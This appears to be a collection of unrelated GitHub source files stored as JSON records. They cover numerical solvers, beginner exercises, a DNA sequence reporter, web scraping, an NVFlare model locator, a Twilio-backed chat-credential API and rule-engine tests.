{"seq_id":"33205551475","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n@author: Leandro\n\"\"\"\n\nfrom numpy import array \n\n#Function that solves the system once the matrix is triangular\ndef resolveTri(A):\n n = len(A) - 1\n res = []\n\n for i in range(len(A)):\n j = len(A) - 1\n x = []\n r = 0.0\n while (A[n][j] != 0):\n x.append(A[n][j])\n j = j - 1\n if j < 0:\n break\n if len(x) == 1:\n res.append(A[n][-1] / x[0])\n else:\n i = 0\n for i in range(len(res)):\n r = x[i] * res[i] + r\n res.append((A[-n][-1] - r) / x[-1])\n n = n - 1\n return res\n\n#Function that finds the entry with the largest absolute value in the given column\ndef achaMaior(A, i, j):\n maior = 0\n maiorIndice = i\n while i < len(A):\n if abs(A[i][j]) > maior:\n maior = abs(A[i][j])\n maiorIndice = i\n i += 1\n return maiorIndice\n\ndef gauss(A):\n for j in range(len(A[0]) - 1):\n i = j\n maior = achaMaior(A, i, j)\n aux = A[i]\n A[i] = A[maior]\n A[maior] = aux\n j1 = j\n div = A[i][j]\n while j1 < len(A[i]):\n A[i][j1] = A[i][j1] / div\n j1 += 1\n i += 1\n while i < len(A):\n mul = A[i][j]\n for j1 in range(len(A[0])):\n A[i][j1] -= A[j][j1] * mul\n i += 1\n print ('\nMatrix after pivoting\n')\n print (A)\n r = resolveTri(A)\n return r\n\nA = array([ [ 2., 2., 1., 1.],\n [ 1.,-1., 2.,-1.],\n [ 3., 2.,-3.,-2.],\n [ 4., 3., 2., 1.] ])\n\nB = array([ [ 7.],\n [ 1.],\n [ 4.],\n [12.] 
])\n\ngauss(A)\n#print(gauss(A))\n","repo_name":"leandromarquesssantos/CalculoN","sub_path":"Python/gauss.py","file_name":"gauss.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71003921974","text":"from model.voivodeship import Voivodeship\nfrom model.county import County\nfrom model.community import Community\nfrom model.statistic import Statistic\nimport os, sys\n\nclass Controller:\n\n def __init__(self, ui, dao):\n self.ui = ui\n self.dao = dao\n self.dao.load_file()\n self.start_controller()\n\n def start_controller(self):\n self.start = 1\n while self.start:\n self.ui.print(self.ui.create_menu(self.ui.menu ,self.ui.title))\n self.user = self.ui.user_choice(self.ui.menu)\n self.handle_menu()\n\n def handle_menu(self):\n if self.user == 1:\n self.display_stats()\n elif self.user == 2:\n self.show_longest_name()\n elif self.user == 3:\n self.display_biggest_county()\n elif self.user == 4:\n self.check_same_locations()\n elif self.user == 5:\n self.advanced_search()\n elif self.user == 0:\n sys.exit('bye')\n\n @staticmethod\n def calculate_stats():\n for unit in Statistic.all_units:\n for type, amount in Statistic.statistic.items():\n if unit.type == type:\n Statistic.statistic[type] += 1\n\n def display_stats(self):\n self.calculate_stats()\n self.ui.print(self.ui.show_stats(Statistic.statistic))\n\n def show_longest_name(self):\n cities = {city.name:len(city.name) for city in Statistic.all_units if city.type == 'miasto'}\n cities = sorted(cities, key=lambda value:cities[value], reverse = True)\n self.ui.print(self.ui.create_menu(cities[0:3], self.ui.title1))\n\n def display_biggest_county(self):\n self.ui.print(max(County.all_counties, key=lambda county:len(county.communities)).name)\n\n def check_same_locations(self):\n locations = {}\n for location in Statistic.all_units:\n if location.name not in locations:\n locations[location.name] = 1\n else:\n locations[location.name] += 1\n\n locations = {k:v for k,v in locations.items() if v > 1}\n self.ui.print(self.ui.show_stats(locations))\n\n def advanced_search(self):\n user = self.ui.search_input()\n search_list = sorted([unit.name+'--->'+unit.type for unit in Statistic.all_units if user in unit.name])\n self.ui.print(self.ui.create_menu(search_list, self.ui.title2))","repo_name":"Ziem0/Neighbour","sub_path":"controller/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21499424677","text":"import inspect\n\nfrom autograd import elementwise_grad\n\nfrom surpyval import np\nfrom surpyval.parametric.parametric_fitter import ParametricFitter\n\n\nclass CustomDistribution(ParametricFitter):\n def __init__(self, name, fun, param_names, bounds, support):\n if str(inspect.signature(fun)) != \"(x, *params)\":\n detail = \"Function must have the signature '(x, *params)'\"\n raise ValueError(detail)\n\n if len(param_names) != len(bounds):\n raise ValueError(\"param_names and bounds must have same length\")\n\n if \"p\" in param_names:\n detail = \"'p' reserved parameter name for LFP distributions\"\n raise ValueError(detail)\n\n if \"gamma\" in param_names:\n detail = \"'gamma' reserved parameter name for offset distributions\"\n raise ValueError(detail)\n\n if \"f0\" in param_names:\n detail = (\n \"'f0' reserved parameter name for zero\"\n + \"inflated or hurdle models\"\n )\n raise 
ValueError(detail)\n\n for p_name in param_names:\n if hasattr(self, p_name):\n detail = \"Can't name a parameter after a function\"\n raise ValueError(detail)\n\n super().__init__(\n name=name,\n k=len(param_names),\n bounds=bounds,\n support=support,\n param_names=param_names,\n param_map={v: i for i, v in enumerate(param_names)},\n plot_x_scale=\"linear\",\n y_ticks=np.linspace(0, 1, 11),\n )\n self.Hf = fun\n self.hf = lambda x, *params: elementwise_grad(self.Hf)(x, *params)\n self.sf = lambda x, *params: np.exp(-self.Hf(x, *params))\n self.ff = lambda x, *params: 1 - np.exp(-self.Hf(x, *params))\n self.df = lambda x, *params: elementwise_grad(self.ff)(x, *params)\n\n def _parameter_initialiser(self, x, c=None, n=None, t=None, offset=False):\n out = []\n for low, high in self.bounds:\n if (low is None) & (high is None):\n out.append(0)\n elif high is None:\n out.append(low + 1.0)\n elif low is None:\n out.append(high - 1.0)\n else:\n out.append((high + low) / 2.0)\n\n return out\n\n def mpp_inv_y_transform(self, y, *params):\n return y\n\n def mpp_y_transform(self, y, *params):\n return y\n\n def mpp_x_transform(self, x, gamma=0):\n return x - gamma\n","repo_name":"derrynknife/SurPyval","sub_path":"surpyval/parametric/custom_distribution.py","file_name":"custom_distribution.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"21"}
{"seq_id":"11360325093","text":"'''\nUntil «КОНЕЦ» 1\nThe program receives a sequence of words as input, each word on a separate line. \nThe end of the sequence is the word «КОНЕЦ» (without the quotes). \nWrite a program that prints the members of this sequence.\n#\nInput format\nThe program receives a sequence of words as input, each word on a separate line.\n#\nOutput format\nThe program must print the members of this sequence.\n'''\n# + a few more problems were solved here as well\n\nsome_text = input()\ncount = 0\nwhile some_text != 'стоп' and some_text != 'хватит' and some_text != 'достаточно':\n # print(some_text)\n some_text = input()\n count += 1\n if some_text == 'стоп' or some_text == 'хватит' or some_text == 'достаточно':\n print(count)","repo_name":"p1pk4/StepikTasks","sub_path":"For_While/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"4418906520","text":"from collections import defaultdict\n\nclass Graph:\n def __init__(self, vertices):\n self.V = vertices\n self.graph = defaultdict(list)\n\n def addEdge(self, u, v):\n self.graph[u].append(v)\n\n def printAllPathsUtil(self, u, d, visited, path):\n\n #Mark the current node as visited and store in path\n visited[u] = True\n path.append(u)\n\n #If current vertex is same as destination, then print current path[]\n if u == d:\n print(path)\n\n else:\n #If current vertex is not destination\n #Recur for all the vertices adjacent to this vertex\n for i in self.graph[u]:\n if visited[i] == False:\n self.printAllPathsUtil(i, d, visited, path)\n\n #Remove current vertex from path[] and mark it as unvisited\n path.pop()\n visited[u] = False\n\n def printAllPaths(self, s, d):\n\n visited = [False] * (self.V)\n\n path = []\n\n self.printAllPathsUtil(s, d, visited, path)\n\n\ng = Graph(4)\ng.addEdge(0, 1)\ng.addEdge(0, 2)\ng.addEdge(0, 3)\ng.addEdge(2, 0)\ng.addEdge(2, 1)\ng.addEdge(1, 3)\n\ns = 2\nd = 3\nprint(\"Following are all different paths from %d to %d :\" % (s, 
d))\ng.printAllPaths(s, d)\n\n\n\n\n\n","repo_name":"Taoge123/LeetCode","sub_path":"TopInterviewQuestions/AllPath.py","file_name":"AllPath.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"14452619973","text":"# The main function effectively runs the entire code, calling the functions in the correct order.\r\n# It starts by calling the intro function, then establishes the input and output file names.\r\n# It then opens the input file and stores its contents into a variable.\r\n# A for loop is then used to go through the contents of the input file, storing each region name and its\r\n# nucleotide sequence into variables.\r\n# The count function is then called, along with the mass function.\r\n# Followed by the codons_list function, then the output function.\r\n# It finishes by writing all of the outputs from the various functions into an output file that was named when\r\n# asking the user for the output file name.\r\ndef main():\r\n intro_message()\r\n in_file = input(\"Input file name? \")\r\n out_file = input(\"Output file name? \")\r\n with open(in_file) as f:\r\n lines = f.readlines()\r\n for i in range(0, len(lines), 2):\r\n name = lines[i]\r\n nuc = lines[i + 1]\r\n nuc = nuc.upper()\r\n count_l, junk_count = get_count(nuc)\r\n mass_l, total_m = get_mass(count_l, junk_count)\r\n codon_l = codons_list(nuc)\r\n is_pro = is_protein(codon_l, mass_l)\r\n output_l = output(name, nuc, count_l, mass_l, total_m, codon_l, is_pro)\r\n with open(out_file, 'a') as o:\r\n for line in output_l:\r\n o.write(line)\r\n \r\n\r\n# This function prints the intro statement that is placed at the beginning of the file.\r\ndef intro_message():\r\n print(\"This program reports information about DNA\\nnucleotide sequences that may encode proteins.\")\r\n \r\n\r\n\r\n# This function effectively determines the amount of \"A\", \"C\", \"G\", and \"T\" values in the nucleotide\r\n# sequence of the region name and returns a list of those counts, as well as the amount of \"-\",\r\n# or \"junk\".\r\ndef get_count(chain):\r\n a_count = 0\r\n c_count = 0\r\n g_count = 0\r\n t_count = 0\r\n junk_count = 0\r\n for nuc in chain:\r\n if nuc == \"A\":\r\n a_count += 1\r\n elif nuc == \"C\":\r\n c_count += 1\r\n elif nuc == \"G\":\r\n g_count += 1\r\n elif nuc == \"T\":\r\n t_count += 1\r\n elif nuc == \"-\":\r\n junk_count += 1\r\n count_list = [a_count, c_count, g_count, t_count]\r\n return count_list, junk_count\r\n\r\n# This function uses the mass of each individual nucleotide to calculate the\r\n# mass percentage of each ACGT nucleotide value and returns a list of those percentages.\r\n# It also returns the total mass of all the nucleotides combined.\r\ndef get_mass(count_list, junk_count):\r\n a_count = count_list[0]\r\n c_count = count_list[1]\r\n g_count = count_list[2]\r\n t_count = count_list[3]\r\n amass_t = a_count * 135.128\r\n cmass_t = c_count * 111.103\r\n gmass_t = g_count * 151.128\r\n tmass_t = t_count * 125.107\r\n junk_t = junk_count * 100\r\n total_mass = round(amass_t + cmass_t + gmass_t + tmass_t + junk_t, 1)\r\n a_pct = round((amass_t / total_mass) * 100, 1)\r\n c_pct = round((cmass_t / total_mass) * 100, 1)\r\n g_pct = round((gmass_t / total_mass) * 100, 1)\r\n t_pct = round((tmass_t / total_mass) * 100, 1)\r\n mass_list = [a_pct, c_pct, g_pct, t_pct]\r\n return mass_list, total_mass\r\n\r\n# This function splits the nucleotide sequence into 
codons, then puts each codon as an element\r\n# into a list. That list is then returned.\r\ndef codons_list(nucleotide):\r\n codon_list = []\r\n nucleotide = nucleotide.split(\"-\")\r\n nucleotide = \"\".join(nucleotide)\r\n for i in range(0, len(nucleotide) - 2, 3):\r\n var = nucleotide[i] + nucleotide[i + 1] + nucleotide[i + 2]\r\n codon_list.insert(i, var)\r\n return codon_list\r\n\r\n# This function takes the codon list that was returned and proceeds to determine if it meets all of the requirements\r\n# of being a protein. If it is determined to be a protein, the is_protein varaible is stored as YES, if not, is_protein\r\n# is stored as NO... is_protein is then returned.\r\ndef is_protein(codon_list, mass_list):\r\n is_protein = \"\"\r\n end_codons = [\"TAA\", \"TAG\", \"TGA\"]\r\n c_pct = mass_list[1]\r\n g_pct = mass_list[2]\r\n if codon_list[0] == \"ATG\":\r\n if codon_list[len(codon_list) - 1] in end_codons:\r\n if len(codon_list) >= 5:\r\n if c_pct + g_pct > 30.0:\r\n is_protein = \"YES\"\r\n else:\r\n is_protein = \"NO\"\r\n else:\r\n is_protein = \"NO\"\r\n else:\r\n is_protein = \"NO\"\r\n else:\r\n is_protein = \"NO\"\r\n return is_protein\r\n \r\n \r\n \r\n \r\n# This function effectively stores all of the outputted information into a list so that the main function can write\r\n# all of these values into the output file. Once it does this it returns the output list.\r\ndef output(name, nuc, count_list, mass_list, total_mass, codon_list, protein):\r\n output_l = []\r\n output_l.append(f\"Region Name: {name}\")\r\n output_l.append(f\"Nucleotides: {nuc}\") \r\n output_l.append(f\"Nuc. Counts: {count_list}\")\r\n output_l.append(\"\\n\")\r\n output_l.append(f\"Total Mass%: {mass_list} of {total_mass}\")\r\n output_l.append(\"\\n\")\r\n output_l.append(f\"Codons List: {codon_list}\")\r\n output_l.append(\"\\n\")\r\n output_l.append(f\"Is Protein?: {protein}\")\r\n output_l.append(\"\\n\")\r\n output_l.append(\"\\n\")\r\n return output_l\r\n \r\n \r\nmain()\r\n","repo_name":"ajmastra/DNA-processing-LAB6","sub_path":"dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36695272162","text":"import math\n\nnum_magnolias = int(input())\nnum_hyacinths = int(input())\nnum_roses = int(input())\nnum_cacti = int(input())\nprc_gift = float(input())\n\nmagnolias = 3.25\nhyacinths = 4\nrose = 3.50\ncacti = 8\n\ntotal = (num_magnolias * magnolias) + (num_hyacinths * hyacinths) + (num_cacti * cacti) + (num_roses * rose)\ntotal_after_taxes = total * 0.95\n\nif total_after_taxes >= prc_gift:\n print(f\"She is left with {math.floor(total_after_taxes - prc_gift)} leva.\")\nelse:\n print(f\"She will have to borrow {math.ceil(prc_gift - total_after_taxes)} leva.\")\n","repo_name":"BlackRock17/Programming-Basics-Python-2022","sub_path":"Conditional_Statement/flower_shop.py","file_name":"flower_shop.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38899283485","text":"import streamlit as st\nimport pandas as pd\n\n\ndef upload():\n upload_csv = st.file_uploader('upload csv',type='csv',label_visibility=\"hidden\")\n \n if upload_csv is not None:\n upload_csv = pd.read_csv(upload_csv)\n st.write(upload_csv.head(5))\n \n return upload_csv\n\n\ndef upload_all():\n \"\"\"only use all points data (This function will be removed)\"\"\"\n st.markdown('### upload all points 
GIS-data')\n all_points = st.file_uploader('upload all points data',type='csv',label_visibility=\"hidden\")\n \n if all_points is not None:\n all_points = pd.read_csv(all_points)\n st.write(all_points.head(5))\n \n return all_points\n","repo_name":"shosuke-13/Stream-GBM","sub_path":"modules/file_uploader.py","file_name":"file_uploader.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"32707990156","text":"import uuid\n\nimport settings\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom sqlalchemy.orm import joinedload\nfrom twilio.util import TwilioCapability\n\nfrom trsvcscore.db.models import Chat\n\nfrom factory.db import db_session_factory\nfrom rest import fields\nfrom rest.alchemy.transaction import AlchemyTransaction\nfrom rest.authorization import ResourceAuthorizer\nfrom rest.exceptions import AuthorizationError, ResourceNotFound\nfrom rest.alchemy.manager import AlchemyResourceManager\nfrom rest.alchemy.query import AlchemyQuery\nfrom rest.resource import Resource\nfrom resources.chat import ChatResource\n\nclass ChatCredentialAuthorizer(ResourceAuthorizer):\n def __init__(self, db_session_factory):\n super(ChatCredentialAuthorizer, self).__init__()\n self.transaction_factory = lambda: AlchemyTransaction(db_session_factory)\n\n def authorize_create_query(self, context, request, query):\n resource = context.data\n\n with self.transaction_factory() as db_session:\n user_id = context.user_id\n chat_id_field = resource.desc.fields_by_name[\"chat_id\"]\n chat_id = chat_id_field.validate_for_model(resource.chat_id)\n db_query = db_session.query(Chat) \\\n .filter(Chat.id == chat_id) \\\n .options([joinedload(Chat.chat_participants)])\n chat = db_query.one()\n \n if chat.end is not None:\n msg = \"chat credentials cannot be created for ended chat\"\n raise AuthorizationError(message=msg,\n developer_message=msg,\n user_message=msg)\n\n participant_ids = [p.user_id for p in chat.chat_participants]\n if user_id not in participant_ids:\n msg = \"non-participants cannot create chat credentials\"\n raise AuthorizationError(message=msg,\n developer_message=msg,\n user_message=msg)\n return query\n\nclass ChatCredentialManager(AlchemyResourceManager):\n def __init__(self, *args, **kwargs):\n kwargs[\"query_class\"] = ChatCredentialQuery\n super(ChatCredentialManager, self).__init__(*args, **kwargs)\n\n\nclass ChatCredentialQuery(AlchemyQuery):\n def __init__(self, resource_class, transaction_factory):\n super(ChatCredentialQuery, self).__init__(\n resource_class, transaction_factory)\n\n def create(self, **kwargs):\n resource = kwargs.pop(\"resource\", None)\n if resource is None:\n resource = self.resource_class(**kwargs)\n\n resource.id = uuid.uuid4().hex\n resource.token = self._get_chat_token(resource)\n resource.twilio_capability = self._get_twilio_capability(resource)\n return resource\n \n def _get_chat_token(self, resource):\n chat_id_field = self.resource_class.desc.fields_by_name[\"chat_id\"]\n chat_id = chat_id_field.validate_for_model(resource.chat_id)\n\n with self.transaction_factory() as db_session:\n query = db_session.query(Chat) \\\n .filter(Chat.id == chat_id)\n try: \n chat = query.one()\n return chat.token\n except NoResultFound:\n raise ResourceNotFound()\n\n def _get_twilio_capability(self, resource):\n cap = TwilioCapability(settings.TWILIO_ACCOUNT_SID,\n settings.TWILIO_AUTH_TOKEN)\n cap.allow_client_outgoing(settings.TWILIO_APPLICATION_SID)\n return 
cap.generate(expires=60)\n\n\n\nclass ChatCredentialResource(Resource):\n class Meta:\n resource_name = \"chat_credentials\"\n model_class = dict\n methods = [\"POST\"]\n filtering = {\n \"id\": [\"eq\"]\n }\n id = fields.StringField(primary_key=True) \n chat_id = fields.EncodedField()\n token = fields.StringField(readonly=True, nullable=True)\n twilio_capability = fields.StringField(readonly=True, nullable=True)\n\n chat = fields.EncodedForeignKey(ChatResource, backref=\"chat_credentials\")\n\n objects = ChatCredentialManager(db_session_factory)\n authorizer = ChatCredentialAuthorizer(db_session_factory)\n","repo_name":"techresidents/apisvc","sub_path":"apisvc/resources/chat_credential.py","file_name":"chat_credential.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"11573959428","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\n\r\npage = requests.get(\"http://forecast.weather.gov/MapClick.php?lat=37.7772&lon=-122.4168\")\r\nsoup = BeautifulSoup(page.content, 'html.parser')\r\n\r\nseven_day = soup.find(id=\"seven-day-forecast\")\r\n\r\nperiod_tags = seven_day.select(\".tombstone-container .period-name\")\r\nperiods = [pt.get_text() for pt in period_tags]\r\n\r\nshort_descs = [sd.get_text() for sd in seven_day.select(\".tombstone-container .short-desc\")]\r\ntemps = [t.get_text() for t in seven_day.select(\".tombstone-container .temp\")]\r\ndescs = [d[\"title\"] for d in seven_day.select(\".tombstone-container img\")]\r\n\r\nweather = pd.DataFrame({\r\n \"period\": periods,\r\n \"short_desc\": short_descs,\r\n \"temp\": temps,\r\n \"desc\":descs\r\n})\r\nprint(weather)\r\n\r\ntemp_nums = weather[\"temp\"].str.extract(r\"(?P<temp_num>\\d+)\", expand=False)\r\nweather[\"temp_num\"] = temp_nums.astype('int')\r\nprint(temp_nums)\r\n\r\nprint(weather[\"temp_num\"].mean())\r\nprint(weather[\"temp_num\"].mean().round())\r\n\r\nwriter = pd.ExcelWriter(\"webscrap.xlsx\", engine='xlsxwriter')\r\nweather.to_excel(writer)\r\nwriter.save()\r\n","repo_name":"zuspitez/WebScraping","sub_path":"web_scraping #3.py","file_name":"web_scraping #3.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"10756013732","text":"import os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '-1'\n\nfrom nvflare.apis.dxo import DXO, DataKind\nfrom nvflare.apis.fl_constant import FLContextKey\nfrom nvflare.apis.fl_context import FLContext\nfrom nvflare.app_common.abstract.model_locator import ModelLocator\n\nfrom tensorflow import keras\nfrom tf2_common.tf2_constants import Constants as TF2Constants\nfrom typing import List\n\nclass TF2ModelLocator(ModelLocator):\n \n def __init__(\n self,\n model_dir = 'models',\n model_name = '%s.h5' % TF2Constants.GLOBAL_MODEL_NAME\n ):\n \"\"\"The ModelLocator's job is to find the models to be included for cross site evaluation\n located on server. This TF2ModelLocator finds and extracts the \"server\" model that is saved during training.\n\n Args:\n model_dir (str): Directory to look for models in. Defaults to \"models\".\n model_name (str): Name of the model. 
Defaults to \"server.h5\"\n \"\"\"\n super().__init__()\n\n self.model_dir = model_dir\n self.model_file_name = model_name\n\n def get_model_names(self, fl_ctx: FLContext) -> List[str]:\n \"\"\"Returns the list of model names that should be included from server in cross site validation.add()\n\n Args:\n fl_ctx (FLContext): FL Context object.\n\n Returns:\n List[str]: List of model names.\n \"\"\"\n return [TF2Constants.GLOBAL_MODEL_NAME]\n\n\n def locate_model(self, model_name, fl_ctx: FLContext) -> DXO:\n self.log_info(fl_ctx, 'locate_model(model_name=%s)' % model_name)\n dxo = None\n engine = fl_ctx.get_engine()\n\n if model_name == TF2Constants.GLOBAL_MODEL_NAME:\n try:\n job_id = fl_ctx.get_prop(FLContextKey.CURRENT_RUN)\n run_dir = engine.get_workspace().get_run_dir(job_id)\n model_path = os.path.join(run_dir, self.model_dir)\n\n model_load_path = os.path.join(model_path, self.model_file_name)\n model = None\n try:\n model = keras.models.load_model(model_load_path)\n self.log_info(fl_ctx, f\"Loaded {model_name} model from {model_load_path}.\")\n except Exception as e:\n self.log_error(fl_ctx, f\"Unable to load Keras Model: {e}.\")\n\n if model is not None:\n weights = {k: v.numpy() for k,v in model.get_weight_paths().items()}\n dxo = DXO(data_kind=DataKind.WEIGHTS, data=weights, meta={})\n except Exception as e:\n self.log_exception(fl_ctx, f\"Exception in retrieving {TF2ModelLocator.SERVER_MODEL_NAME} model: {e}.\")\n\n return dxo","repo_name":"IISAS/nvflare-hysped","sub_path":"volumes/dev/tf/nvflare-sverepec_spolu-sim/app/custom/tf2_model_locator.py","file_name":"tf2_model_locator.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22570832846","text":"from django.shortcuts import render\nfrom django.views.generic.edit import CreateView, UpdateView\nfrom django import forms\nfrom ridesharing.models import Ride\n\n\n# Create your views here.\n\n#this function is called when you access the /ridesharing/ride/add\ndef ride_create(request):\n #create the form you want to add to the html page\n form = RideForm(request.POST or None)\n #make sure form is valid\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n #create a context to pass into the html page\n context = {\n \"form\": form,\n }\n #return the ride_form.html page passing in the context of the form\n return render(request, \"ridesharing/ride_form.html\", context)\n\n\n# used by the the above function for the form for posting a new ride\nclass RideForm(forms.ModelForm):\n class Meta:\n # What model you are trying to create with this form\n model = Ride\n # What fields you want to be able to fill out\n fields = [\"destination\", \"date\"]\n","repo_name":"lbengzon/pigeon","sub_path":"ridesharing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17940285675","text":"\"\"\"\n Given a sequence of integer numbers ending with the number 0. Determine the length of the widest fragment where all the elements are equal to each other. 
\n\nFor example, on input\n5\n3\n4\n4\n5\n5\n6\n4\n4\n4\n0\noutput must be\n3\n\"\"\"\nnum1 = int(input())\nresults = 1\nfinal = 1\n\nwhile True:\n num2 = int(input())\n if num2 == 0:\n break\n if num2 == num1:\n results += 1\n if final <= results:\n final += 1\n else:\n results = 0\n num1 = num2\n \nprint(final)\n","repo_name":"piotrpatrzylas/Repl.it","sub_path":"POPI challenging problems (optional)/Session 2 Maximal number of consecutive equal elements.py","file_name":"Session 2 Maximal number of consecutive equal elements.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"36152524307","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# author:wttree\n# datetime:2018/10/25 13:37\n# software: PyCharm\n# question: reorder the data so that odd numbers come before even numbers\n\n'''\nGiven an integer array, implement a function that adjusts the order of the numbers in the array\nso that all the odd numbers are in the first half of the array and all the even numbers are in the\nsecond half, while keeping the relative order among the odd numbers and among the even numbers unchanged.\n'''\n\nclass Solution:\n\n #v1.0 cannot guarantee that the relative order among odd numbers and among even numbers stays unchanged\n def reOrderArray(self, array):\n n = len(array)\n i = 0\n j = n-1\n while i < j:\n # Two-pointer partition: move odd numbers to the front, even numbers to the back.\n while i < j and array[i] % 2 == 1:\n i += 1\n while i < j and array[j] % 2 == 0:\n j -= 1\n array[i], array[j] = array[j], array[i]\n return array\n\n\nimport math\nfrom typing import List\n\n\nclass Solution:\n def shortestPath(self, grid: List[List[int]], k: int) -> int:\n n = len(grid)\n m = len(grid[0])\n\n used = set()\n\n cache = dict()\n def do(row: int, col: int, k: int) -> int:\n d = cache.get((row, col, k))\n if d:\n return d\n if row == n or col == m or row == -1 or col == -1 or (row, col) in used or (k == 0 and grid[row][col] == 1):\n cache[(row, col, k)] = math.inf\n return math.inf\n if row == n - 1 and col == m - 1:\n return 0\n new_k = k - grid[row][col]\n used.add((row, col))\n res_cur = min([\n do(row - 1, col, 
TransformerResult.RETURN\n\n def transformer_return_value(_value):\n def inner(value):\n return TransformerResult.RETURN, _value\n return inner\n\n self.engine.add_rule(\n \"Test1\", predicate_true, \"\", transformer_return_value(\"a\")\n )\n\n self.engine.add_rule(\n \"Test2\", predicate_false, \"\", transformer_continue\n )\n self.engine.add_rule(\n \"Test2\", predicate_true, \"\", transformer_return_value(\"a\")\n )\n\n self.engine.add_rule(\n \"Test3\", predicate_true, \"\", transformer_continue\n )\n self.engine.add_rule(\n \"Test3\", predicate_true, \"\", transformer_return\n )\n\n self.engine.add_rule(\n \"Test4\", predicate_true, \"\", transformer_continue_value(True)\n )\n self.engine.add_rule(\n \"Test4\", predicate_is_true, \"\", transformer_return_value(True)\n )\n\n self.rule_set = \"Test1\"\n self.value = \"\"\n\n result = self.loop.run_until_complete(self.do_run())\n assert_equal(\n result,\n \"a\",\n \"Invalid result for Test1; expected \\\"a\\\", got {}\".format(\n repr(result)\n )\n )\n\n self.rule_set = \"Test2\"\n\n result = self.loop.run_until_complete(self.do_run())\n assert_equal(\n result,\n False,\n \"Invalid result for Test2; expected False, got {}\".format(\n repr(result)\n )\n )\n\n self.rule_set = \"Test3\"\n\n result = self.loop.run_until_complete(self.do_run())\n assert_equal(\n result,\n None,\n \"Invalid result for Test3; expected None, got {}\".format(\n repr(result)\n )\n )\n\n self.rule_set = \"Test4\"\n\n result = self.loop.run_until_complete(self.do_run())\n assert_equal(\n result,\n True,\n \"Invalid result for Test4; expected True, got {}\".format(\n repr(result)\n )\n )\n\n def test_predicates(self):\n \"\"\"\n Bundled predicates\n \"\"\"\n\n def transformer_return_value(value):\n def inner(_value):\n return TransformerResult.RETURN, value\n return inner\n\n self.engine.add_rule(\n \"x > y\",\n p.num_greater_than, 5, transformer_return_value(True)\n )\n\n self.rule_set = \"x > y\"\n self.value = 10\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x > y\")\n\n self.engine.add_rule(\n \"x < y\",\n p.num_less_than, 5, transformer_return_value(True)\n )\n\n self.rule_set = \"x < y\"\n self.value = 0\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x < y\")\n\n self.engine.add_rule(\n \"x contains y\",\n p.str_contains, \"abcd\", transformer_return_value(True)\n )\n\n self.rule_set = \"x contains y\"\n self.value = \"a\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x contains y\")\n\n self.engine.add_rule(\n \"x matches y\",\n p.str_matches_regex, r\"[a]+\", transformer_return_value(True)\n )\n\n self.rule_set = \"x matches y\"\n self.value = \"aaaa\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x matches y\")\n\n self.engine.add_rule(\n \"x not contains y\",\n p.str_not_contains, \"bbbb\", transformer_return_value(True)\n )\n\n self.rule_set = \"x not contains y\"\n self.value = \"a\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: not x contains y\")\n\n self.engine.add_rule(\n \"x not matches y\",\n p.str_not_matches_regex, r\"[a]+\", transformer_return_value(True)\n )\n\n self.rule_set = \"x not matches y\"\n self.value = \"bbbb\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: not x matches y\")\n\n self.engine.add_rule(\n \"x == y\",\n p.equal, 5, transformer_return_value(True)\n )\n\n self.rule_set = \"x == y\"\n 
